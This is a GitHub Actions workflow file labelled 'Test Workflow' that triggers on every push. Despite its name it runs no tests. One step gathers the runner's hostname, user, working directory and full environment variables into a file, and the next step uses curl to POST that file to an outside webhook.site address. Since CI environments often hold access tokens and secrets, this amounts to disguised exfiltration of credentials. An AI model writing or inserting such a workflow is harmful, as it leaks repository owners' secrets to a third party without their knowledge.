name: Test Workflow
on: push
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Collect info
        run: |
          echo "Hostname: $(hostname)" > output.txt
          echo "User: $(whoami)" >> output.txt
          echo "PWD: $(pwd)" >> output.txt
          echo "Env:" >> output.txt
          env >> output.txt
      - name: Send to webhook
        run: |
          curl -X POST -H "Content-Type: text/plain" --data-binary @output.txt https://webhook.site/95e9bfba-99e4-4cb1-8350-2e264675f477
